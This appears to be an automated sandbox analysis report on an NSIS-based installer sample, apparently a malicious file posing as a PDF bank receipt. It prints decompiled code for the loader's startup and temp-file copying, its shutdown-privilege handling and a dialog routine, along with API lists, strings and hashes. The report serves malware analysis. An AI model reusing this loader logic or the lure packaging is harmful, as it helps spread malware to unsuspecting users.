				CHAR* _t232;
				signed int _t234;

				0x4c1000 = 0x20;
				_t189 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x470318 = _v324.dwBuildNumber;
				 *0x47031c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x47031e != 0x600) {
					_t180 = E00406A35(_t189);
					if(_t180 != _t189) {
						 *_t180(0xc00);
					}
				}
				_t232 = "UXTHEME";
				do {
					E004069C5(_t232); // executed
					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
				} while ( *_t232 != 0);
				E00406A35(0xb);
				 *0x470264 = E00406A35(9);
				_t88 = E00406A35(7);
				if(_t88 != _t189) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x47031c =  *0x47031c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t189); // executed
				 *0x470320 = _t88;
				SHGetFileInfoW(0x436708, _t189,  &_v1016, 0x2b4, _t189); // executed
				E00406668(0x468260, L"NSIS Error");
				E00406668(0x4c1000, GetCommandLineW());
				_push("true");
				_t94 = 0x4c1000;
				_pop(_t234);
				 *0x470260 = 0x400000;
				if( *0x4c1000 == _t234) {
					_t94 = 0x4c1002;
				}
				_t199 = CharNextW(E00405F64(_t94, 0x4c1000));
				_v16 = _t199;
				while(1) {
					_t97 =  *_t199;
					_t252 = _t97 - _t189;
					if(_t97 == _t189) {
						break;
					}
					_t210 = 0x20;
					__eflags = _t97 - _t210;
					if(_t97 != _t210) {
						L17:
						__eflags =  *_t199 - _t234;
						_v12 = _t210;
						if( *_t199 == _t234) {
							_v12 = _t234;
							_t199 = _t199 + 2;
							__eflags = _t199;
						}
						__eflags =  *_t199 - 0x2f;
						if( *_t199 != 0x2f) {
							L32:
							_t199 = E00405F64(_t199, _v12);
							__eflags =  *_t199 - _t234;
							if(__eflags == 0) {
								_t199 = _t199 + 2;
								__eflags = _t199;
							}
							continue;
						} else {
							_t199 = _t199 + 2;
							__eflags =  *_t199 - 0x53;
							if( *_t199 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t215 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t227 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t215;
								__eflags =  *_t199 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t215);
								if( *_t199 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t215)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t210 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t230 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t210;
									__eflags =  *(_t199 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t210);
									if( *(_t199 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t210)) {
										L31:
										_push("true");
										_pop(_t234);
										goto L32;
									}
									__eflags =  *_t199 - _t230;
									if( *_t199 == _t230) {
										 *(_t199 - 4) = _t189;
										__eflags = _t199;
										E00406668(0x4c5000, _t199);
										L37:
										GetTempPathW(0x2000, 0x4d5000);
										_t116 = E0040360F(_t199, _t252);
										_t253 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(0x4d1000); // executed
											_t118 = E004030D0(_t255, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t189) {
												L68:
												E00403C25();
												__imp__OleUninitialize();
												if(_v8 == _t189) {
													if( *0x4702f4 == _t189) {
														L77:
														_t120 =  *0x47030c;
														if(_t120 != 0xffffffff) {
															_v24 = _t120;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
													}
													_t124 = E00406A35(4);
													if(_t124 == _t189) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t189);
														_push(_t189);
														_push(_t189);
														if( *_t124() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CC8(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x47027c == _t189) {
												L51:
												 *0x47030c =  *0x47030c | 0xffffffff;
												_v24 = E00403D17(_t265);
												goto L68;
											}
											_t219 = E00405F64(0x4c1000, _t189);
											if(_t219 < 0x4c1000) {
												L48:
												_t264 = _t219 - 0x4c1000;
												_v8 = L"Error launching installer";
												if(_t219 < 0x4c1000) {
													_t190 = E00405C33(__eflags);
													lstrcatW(0x4d5000, L"~nsu");
													__eflags = _t190;
													if(_t190 != 0) {
														lstrcatW(0x4d5000, "A");
													}
													lstrcatW(0x4d5000, L".tmp");
													_t138 = lstrcmpiW(0x4d5000, 0x4cd000);
													__eflags = _t138;
													if(_t138 == 0) {
														L67:
														_t189 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t190;
														_push(0x4d5000);
														if(_t190 == 0) {
															E00405C16();
														} else {
															E00405B99();
														}
														SetCurrentDirectoryW(0x4d5000);
														__eflags =  *0x4c5000;
														if( *0x4c5000 == 0) {
															E00406668(0x4c5000, 0x4cd000);
														}
														E00406668(0x471000, _v16);
														_t202 = "A" & 0x0000ffff;
														_t144 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t144;
														_v12 = 0x1a;
														 *0x475000 = _t144;
														do {
															E004066A5(0, 0x432708, 0x4d5000, 0x432708,  *((intOrPtr*)( *0x470270 + 0x120)));
															DeleteFileW(0x432708);
															__eflags = _v8;
															if(_v8 != 0) {
																_t149 = CopyFileW(0x4dd000, 0x432708, "true");
																__eflags = _t149;
																if(_t149 != 0) {
																	E00406428(_t202, 0x432708, 0);
																	E004066A5(0, 0x432708, 0x4d5000, 0x432708,  *((intOrPtr*)( *0x470270 + 0x124)));
																	_t153 = E00405C4B(0x432708);
																	__eflags = _t153;
																	if(_t153 != 0) {
																		CloseHandle(_t153);
																		_v8 = 0;
																	}
																}
															}
															 *0x475000 =  *0x475000 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E00406428(_t202, 0x4d5000, 0);
														goto L67;
													}
												}
												 *_t219 = _t189;
												_t222 =  &(_t219[2]);
												_t158 = E0040603F(_t264,  &(_t219[2]));
												_t265 = _t158;
												if(_t158 == 0) {
													goto L68;
												}
												E00406668(0x4c5000, _t222);
												E00406668(L"C:\\Users\\Arthur\\AppData\\Roaming\\Uundvrligheden\\Rendejerns", _t222);
												_v8 = _t189;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t205 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t168 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t219 != _t205 || _t219[1] != _t168) {
												_t219 = _t219;
												if(_t219 >= 0x4c1000) {
													continue;
												}
												break;
											}
											_t189 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(0x4d5000, 0x1ffb);
										lstrcatW(0x4d5000, L"\\Temp");
										_t171 = E0040360F(_t199, _t253);
										_t254 = _t171;
										if(_t171 != 0) {
											goto L40;
										}
										GetTempPathW(0x1ffc, 0x4d5000);
										lstrcatW(0x4d5000, L"Low");
										SetEnvironmentVariableW(L"TEMP", 0x4d5000);
										SetEnvironmentVariableW(L"TMP", 0x4d5000);
										_t176 = E0040360F(_t199, _t254);
										_t255 = _t176;
										if(_t176 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
									goto L29;
								}
								_t178 =  *((intOrPtr*)(_t199 + 8));
								__eflags = _t178 - 0x20;
								if(_t178 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t178 - _t189;
								if(_t178 != _t189) {
									goto L29;
								}
								goto L28;
							}
							_t179 =  *((intOrPtr*)(_t199 + 2));
							__eflags = _t179 - _t210;
							if(_t179 == _t210) {
								L23:
								 *0x470300 = 1;
								goto L24;
							}
							__eflags = _t179 - _t189;
							if(_t179 != _t189) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t199 = _t199 + 2;
						__eflags =  *_t199 - _t210;
					} while ( *_t199 == _t210);
					goto L17;
				}
				goto L37;
			}














































                                                                                              0x0040364e
                                                                                              0x0040364f
                                                                                              0x00403656
                                                                                              0x00403659
                                                                                              0x00403660
                                                                                              0x00403663
                                                                                              0x00403676
                                                                                              0x0040367c
                                                                                              0x0040367f
                                                                                              0x00403682
                                                                                              0x00403690
                                                                                              0x00403698
                                                                                              0x004036a3
                                                                                              0x004036bc
                                                                                              0x004036be
                                                                                              0x004036c6
                                                                                              0x004036c6
                                                                                              0x004036d1
                                                                                              0x004036d3
                                                                                              0x004036d3
                                                                                              0x004036e8
                                                                                              0x0040370d
                                                                                              0x0040371b
                                                                                              0x0040371e
                                                                                              0x00403725
                                                                                              0x0040372c
                                                                                              0x0040372c
                                                                                              0x00403725
                                                                                              0x0040372e
                                                                                              0x00403733
                                                                                              0x00403734
                                                                                              0x00403740
                                                                                              0x00403744
                                                                                              0x0040374b
                                                                                              0x00403759
                                                                                              0x0040375e
                                                                                              0x00403765
                                                                                              0x00403769
                                                                                              0x0040376d
                                                                                              0x0040376f
                                                                                              0x0040376f
                                                                                              0x0040376d
                                                                                              0x00403776
                                                                                              0x0040377d
                                                                                              0x00403783
                                                                                              0x0040379b
                                                                                              0x004037ab
                                                                                              0x004037bd
                                                                                              0x004037c2
                                                                                              0x004037c4
                                                                                              0x004037c6
                                                                                              0x004037c7
                                                                                              0x004037d8
                                                                                              0x004037dc
                                                                                              0x004037dc
                                                                                              0x004037ef
                                                                                              0x004037f1
                                                                                              0x004038eb
                                                                                              0x004038eb
                                                                                              0x004038ee
                                                                                              0x004038f1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004037fb
                                                                                              0x004037fc
                                                                                              0x004037ff
                                                                                              0x00403808
                                                                                              0x00403808
                                                                                              0x0040380b
                                                                                              0x0040380e
                                                                                              0x00403811
                                                                                              0x00403814
                                                                                              0x00403814
                                                                                              0x00403814
                                                                                              0x00403815
                                                                                              0x00403819
                                                                                              0x004038d9
                                                                                              0x004038e2
                                                                                              0x004038e4
                                                                                              0x004038e7
                                                                                              0x004038ea
                                                                                              0x004038ea
                                                                                              0x004038ea
                                                                                              0x00000000
                                                                                              0x0040381f
                                                                                              0x00403820
                                                                                              0x00403821
                                                                                              0x00403825
                                                                                              0x0040383f
                                                                                              0x00403846
                                                                                              0x00403859
                                                                                              0x0040385a
                                                                                              0x0040386f
                                                                                              0x00403874
                                                                                              0x00403876
                                                                                              0x00403878
                                                                                              0x00403894
                                                                                              0x0040389b
                                                                                              0x004038ae
                                                                                              0x004038af
                                                                                              0x004038c4
                                                                                              0x004038ca
                                                                                              0x004038cc
                                                                                              0x004038ce
                                                                                              0x004038d6
                                                                                              0x004038d6
                                                                                              0x004038d8
                                                                                              0x00000000
                                                                                              0x004038d8
                                                                                              0x004038d2
                                                                                              0x004038d4
                                                                                              0x004038f9
                                                                                              0x004038fd
                                                                                              0x00403906
                                                                                              0x0040390b
                                                                                              0x0040391c
                                                                                              0x0040391e
                                                                                              0x00403923
                                                                                              0x00403925
                                                                                              0x0040397d
                                                                                              0x00403982
                                                                                              0x0040398b
                                                                                              0x00403992
                                                                                              0x00403995
                                                                                              0x00403b6c
                                                                                              0x00403b6c
                                                                                              0x00403b71
                                                                                              0x00403b7a
                                                                                              0x00403b97
                                                                                              0x00403c0f
                                                                                              0x00403c0f
                                                                                              0x00403c17
                                                                                              0x00403c19
                                                                                              0x00403c19
                                                                                              0x00403c1f
                                                                                              0x00403c1f
                                                                                              0x00403bae
                                                                                              0x00403bba
                                                                                              0x00403bcb
                                                                                              0x00403bd2
                                                                                              0x00403bd9
                                                                                              0x00403bd9
                                                                                              0x00403be1
                                                                                              0x00403bed
                                                                                              0x00403bfb
                                                                                              0x00403c06
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403bef
                                                                                              0x00403bef
                                                                                              0x00403bf0
                                                                                              0x00403bf2
                                                                                              0x00403bf3
                                                                                              0x00403bf4
                                                                                              0x00403bf9
                                                                                              0x00403c08
                                                                                              0x00403c0a
                                                                                              0x00000000
                                                                                              0x00403c0a
                                                                                              0x00000000
                                                                                              0x00403bf9
                                                                                              0x00403bed
                                                                                              0x00403b84
                                                                                              0x00403b8b
                                                                                              0x00403b8b
                                                                                              0x004039a1
                                                                                              0x00403a48
                                                                                              0x00403a48
                                                                                              0x00403a54
                                                                                              0x00000000
                                                                                              0x00403a54
                                                                                              0x004039b2
                                                                                              0x004039ba
                                                                                              0x00403a0c
                                                                                              0x00403a0c
                                                                                              0x00403a12
                                                                                              0x00403a19
                                                                                              0x00403a67
                                                                                              0x00403a69
                                                                                              0x00403a6e
                                                                                              0x00403a70
                                                                                              0x00403a78
                                                                                              0x00403a78
                                                                                              0x00403a83
                                                                                              0x00403a8f
                                                                                              0x00403a95
                                                                                              0x00403a97
                                                                                              0x00403b6a
                                                                                              0x00403b6a
                                                                                              0x00403b6a
                                                                                              0x00000000
                                                                                              0x00403a9d
                                                                                              0x00403a9d
                                                                                              0x00403a9f
                                                                                              0x00403aa0
                                                                                              0x00403aa9
                                                                                              0x00403aa2
                                                                                              0x00403aa2
                                                                                              0x00403aa2
                                                                                              0x00403aaf
                                                                                              0x00403ab7
                                                                                              0x00403abe
                                                                                              0x00403ac6
                                                                                              0x00403ac6
                                                                                              0x00403ad3
                                                                                              0x00403adf
                                                                                              0x00403ae9
                                                                                              0x00403ae9
                                                                                              0x00403aeb
                                                                                              0x00403af2
                                                                                              0x00403afc
                                                                                              0x00403b08
                                                                                              0x00403b0e
                                                                                              0x00403b14
                                                                                              0x00403b17
                                                                                              0x00403b21
                                                                                              0x00403b27
                                                                                              0x00403b29
                                                                                              0x00403b2d
                                                                                              0x00403b3e
                                                                                              0x00403b44
                                                                                              0x00403b49
                                                                                              0x00403b4b
                                                                                              0x00403b4e
                                                                                              0x00403b54
                                                                                              0x00403b54
                                                                                              0x00403b4b
                                                                                              0x00403b29
                                                                                              0x00403b57
                                                                                              0x00403b5e
                                                                                              0x00403b5e
                                                                                              0x00403b5e
                                                                                              0x00403b5e
                                                                                              0x00403b65
                                                                                              0x00000000
                                                                                              0x00403b65
                                                                                              0x00403a97
                                                                                              0x00403a1b
                                                                                              0x00403a1e
                                                                                              0x00403a22
                                                                                              0x00403a27
                                                                                              0x00403a29
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403a35
                                                                                              0x00403a40
                                                                                              0x00403a45
                                                                                              0x00000000
                                                                                              0x00403a45
                                                                                              0x004039c3
                                                                                              0x004039db
                                                                                              0x004039ec
                                                                                              0x004039ed
                                                                                              0x004039f1
                                                                                              0x004039f3
                                                                                              0x00403a01
                                                                                              0x00403a08
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403a08
                                                                                              0x00403a0a
                                                                                              0x00000000
                                                                                              0x00403a0a
                                                                                              0x0040392d
                                                                                              0x00403939
                                                                                              0x0040393e
                                                                                              0x00403943
                                                                                              0x00403945
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040394d
                                                                                              0x00403955
                                                                                              0x00403966
                                                                                              0x0040396e
                                                                                              0x00403970
                                                                                              0x00403975
                                                                                              0x00403977
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403977
                                                                                              0x00000000
                                                                                              0x004038d4
                                                                                              0x0040387d
                                                                                              0x0040387f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403881
                                                                                              0x00403885
                                                                                              0x00403889
                                                                                              0x00403890
                                                                                              0x00403890
                                                                                              0x00403890
                                                                                              0x00403890
                                                                                              0x00000000
                                                                                              0x00403890
                                                                                              0x0040388b
                                                                                              0x0040388e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040388e
                                                                                              0x00403827
                                                                                              0x0040382b
                                                                                              0x0040382e
                                                                                              0x00403835
                                                                                              0x00403835
                                                                                              0x00000000
                                                                                              0x00403835
                                                                                              0x00403830
                                                                                              0x00403833
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403833
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403801
                                                                                              0x00403801
                                                                                              0x00403802
                                                                                              0x00403803
                                                                                              0x00403803
                                                                                              0x00000000
                                                                                              0x00403801
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                                                                              • GetVersionExW.KERNEL32(?), ref: 0040368C
                                                                                              • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                                                                              • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                                                                              • OleInitialize.OLE32(00000000), ref: 0040377D
                                                                                              • SHGetFileInfoW.SHELL32(00436708,00000000,?,000002B4,00000000), ref: 0040379B
                                                                                              • GetCommandLineW.KERNEL32(00468260,NSIS Error), ref: 004037B0
                                                                                              • CharNextW.USER32(00000000,004C1000,00000020,004C1000,00000000), ref: 004037E9
                                                                                              • GetTempPathW.KERNEL32(00002000,004D5000,00000000,?), ref: 0040391C
                                                                                              • GetWindowsDirectoryW.KERNEL32(004D5000,00001FFB), ref: 0040392D
                                                                                              • lstrcatW.KERNEL32(004D5000,\Temp), ref: 00403939
                                                                                              • GetTempPathW.KERNEL32(00001FFC,004D5000,004D5000,\Temp), ref: 0040394D
                                                                                              • lstrcatW.KERNEL32(004D5000,Low), ref: 00403955
                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,004D5000,004D5000,Low), ref: 00403966
                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,004D5000), ref: 0040396E
                                                                                              • DeleteFileW.KERNELBASE(004D1000), ref: 00403982
                                                                                              • lstrcatW.KERNEL32(004D5000,~nsu), ref: 00403A69
                                                                                              • lstrcatW.KERNEL32(004D5000,0040A328), ref: 00403A78
                                                                                                • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,004D5000,004D5000,004D5000,004D5000,004D5000,00403923), ref: 00405C1C
                                                                                              • lstrcatW.KERNEL32(004D5000,.tmp), ref: 00403A83
                                                                                              • lstrcmpiW.KERNEL32(004D5000,004CD000,004D5000,.tmp,004D5000,~nsu,004C1000,00000000,?), ref: 00403A8F
                                                                                              • SetCurrentDirectoryW.KERNEL32(004D5000,004D5000), ref: 00403AAF
                                                                                              • DeleteFileW.KERNEL32(00432708,00432708,?,00471000,?), ref: 00403B0E
                                                                                              • CopyFileW.KERNEL32(004DD000,00432708,?), ref: 00403B21
                                                                                              • CloseHandle.KERNEL32(00000000,00432708,00432708,?,00432708,00000000), ref: 00403B4E
                                                                                              • OleUninitialize.OLE32(?), ref: 00403B71
                                                                                              • ExitProcess.KERNEL32 ref: 00403B8B
                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                                                                                              • ExitProcess.KERNEL32 ref: 00403C1F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                              • String ID: .tmp$C:\Users\user\AppData\Roaming\Uundvrligheden\Rendejerns$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                              • API String ID: 3859024572-3046058702
                                                                                              • Opcode ID: 6f84b3f70b10d63d4fa63a96e9f90e328d95052cda10f1887c6d7f591bf7529d
                                                                                              • Instruction ID: b7e5fe29903c30db736afe9723593e932e9124e443bf0bb46b5a7c6934f2d125
                                                                                              • Opcode Fuzzy Hash: 6f84b3f70b10d63d4fa63a96e9f90e328d95052cda10f1887c6d7f591bf7529d
                                                                                              • Instruction Fuzzy Hash: 4CE10771A00214AADB10AFB58D45B6F3EB8AB4570AF10847FF545F22D1DB7C8A81CB6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 143 405809-405824 144 4059b3-4059ba 143->144 145 40582a-4058f1 GetDlgItem * 3 call 4045f9 call 404f52 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 4059e4-4059f1 144->147 148 4059bc-4059de GetDlgItem CreateThread CloseHandle 144->148 166 4058f3-40590d SendMessageW * 2 145->166 167 40590f-405912 145->167 150 4059f3-4059f9 147->150 151 405a0f-405a19 147->151 148->147 153 405a34-405a3d call 40462b 150->153 154 4059fb-405a0a ShowWindow * 2 call 4045f9 150->154 155 405a1b-405a21 151->155 156 405a6f-405a73 151->156 163 405a42-405a46 153->163 154->151 160 405a23-405a2f call 40459d 155->160 161 405a49-405a59 ShowWindow 155->161 156->153 158 405a75-405a7b 156->158 158->153 168 405a7d-405a90 SendMessageW 158->168 160->153 164 405a69-405a6a call 40459d 161->164 165 405a5b-405a64 call 4056ca 161->165 164->156 165->164 166->167 172 405922-405939 call 4045c4 167->172 173 405914-405920 SendMessageW 167->173 174 405b92-405b94 168->174 175 405a96-405ac1 CreatePopupMenu call 4066a5 AppendMenuW 168->175 182 40593b-40594f ShowWindow 172->182 183 40596f-405990 GetDlgItem SendMessageW 172->183 173->172 174->163 180 405ac3-405ad3 GetWindowRect 175->180 181 405ad6-405aeb TrackPopupMenu 175->181 180->181 181->174 185 405af1-405b08 181->185 186 405951-40595c ShowWindow 182->186 187 40595e 182->187 183->174 184 405996-4059ae SendMessageW * 2 183->184 184->174 189 405b0d-405b28 SendMessageW 185->189 188 405964-40596a call 4045f9 186->188 187->188 188->183 189->189 190 405b2a-405b4d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 189->190 192 405b4f-405b76 SendMessageW 190->192 192->192 193 405b78-405b8c GlobalUnlock SetClipboardData CloseClipboard 192->193 193->174
                                                                                              C-Code - Quality: 95%
                                                                                              			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x468244;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						CloseHandle(_t127); // executed
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x446748;
								_v44 = 0x8000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x46822c == _t156) {
							ShowWindow( *0x470268, 8);
							if( *0x4702ec == _t156) {
								_t119 =  *0x43e720; // 0x66d65c
								E004056CA( *((intOrPtr*)(_t119 + 0x34)), _t156);
							}
							E0040459D(_t171);
							goto L25;
						}
						 *0x43a718 = 2;
						E0040459D(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040462B(_a8, _a12, _a16);
						}
						ShowWindow( *0x468230, _t156);
						ShowWindow(_t169, 8);
						E004045F9(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x470270;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x468230 = GetDlgItem(_a4, 0x403);
				 *0x468228 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x468244 = _t134;
				_v8 = _t134;
				E004045F9( *0x468230);
				 *0x468234 = E00404F52(4);
				 *0x46824c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
